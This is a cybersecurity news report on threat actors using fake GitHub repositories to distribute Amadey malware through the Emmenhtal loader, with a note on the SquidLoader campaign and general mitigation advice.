In April 2025, cybersecurity researchers identified a sophisticated campaign where threat actors utilized public GitHub repositories to host and distribute malicious payloads, notably the Amadey malware. This strategy appears to be an attempt to circumvent web filtering mechanisms and streamline the deployment of malware.
Cisco Talos researchers Chris Neal and Craig Jackson reported that operators of malware-as-a-service (MaaS) platforms created fake GitHub accounts to host various payloads, tools, and Amadey plugins. By leveraging GitHub’s trusted infrastructure, these actors aimed to evade detection and facilitate the distribution of their malicious software.
Attack Chain and Malware Deployment
The attack sequence begins with a malware loader known as Emmenhtal, also referred to as PEAKLIGHT. Emmenhtal is responsible for delivering Amadey, which subsequently downloads additional custom payloads from the malicious GitHub repositories. This method mirrors tactics observed in earlier campaigns, such as a February 2025 phishing operation that used invoice-related lures to distribute SmokeLoader via Emmenhtal, particularly targeting Ukrainian entities.
Both Emmenhtal and Amadey function as downloaders for secondary payloads like information stealers. However, Amadey distinguishes itself by its ability to collect system information and extend its capabilities through various DLL plugins. These plugins enable functionalities such as credential theft and screenshot capture, enhancing the malware’s versatility.
GitHub as a Malicious Hosting Platform
The April 2025 campaign involved three GitHub accounts—Legendary99999, DFfe9ewf, and Milidmdds—used to host Amadey plugins, secondary payloads, and other malicious scripts, including Lumma Stealer, RedLine Stealer, and Rhadamanthys Stealer. These accounts have since been removed by GitHub.
Analysis revealed that some JavaScript files in these repositories were identical to those used in previous Emmenhtal campaigns, with the primary difference being the payloads delivered. Specifically, the Emmenhtal loader files in these repositories served as delivery vectors for Amadey, AsyncRAT, and a legitimate copy of PuTTY.exe.
Additionally, a Python script found in the repositories suggests an evolution of Emmenhtal, incorporating an embedded PowerShell command to download Amadey from a hard-coded IP address. This indicates a continuous adaptation and refinement of attack techniques by the threat actors.
Broader Implications and Related Threats
The use of GitHub for hosting malicious payloads underscores a broader trend where cybercriminals exploit trusted platforms to distribute malware. This tactic not only aids in evading detection but also leverages the credibility of legitimate services to deceive users.
In a related development, Trellix detailed a phishing campaign targeting financial services institutions in Hong Kong, which utilized a malware loader known as SquidLoader. SquidLoader employs advanced anti-analysis, anti-sandbox, and anti-debugging techniques, making it a formidable threat. It establishes communication with a remote server to send information about the infected host and injects the next-stage payload, often culminating in the deployment of a Cobalt Strike beacon for remote access and control.
Recommendations for Mitigation
To protect against such sophisticated threats, organizations and individuals should adopt the following measures:
1. Exercise Caution with External Repositories: Be vigilant when downloading and executing code from public repositories. Verify the authenticity of the source and review the code for any anomalies.
2. Implement Robust Security Solutions: Utilize comprehensive security software that includes behavior-based detection capabilities to identify and mitigate malware that employs evasion techniques.
3. Regularly Update Systems: Ensure that all software and systems are up to date with the latest security patches to minimize vulnerabilities that could be exploited by malware.
4. Educate Users: Provide training on recognizing phishing attempts and the risks associated with downloading and executing code from unverified sources.
5. Monitor Network Activity: Implement network monitoring to detect unusual activities that may indicate a compromise, such as unexpected outbound connections or data exfiltration attempts.
By adopting these practices, organizations can enhance their resilience against campaigns that exploit trusted platforms like GitHub to distribute malware.
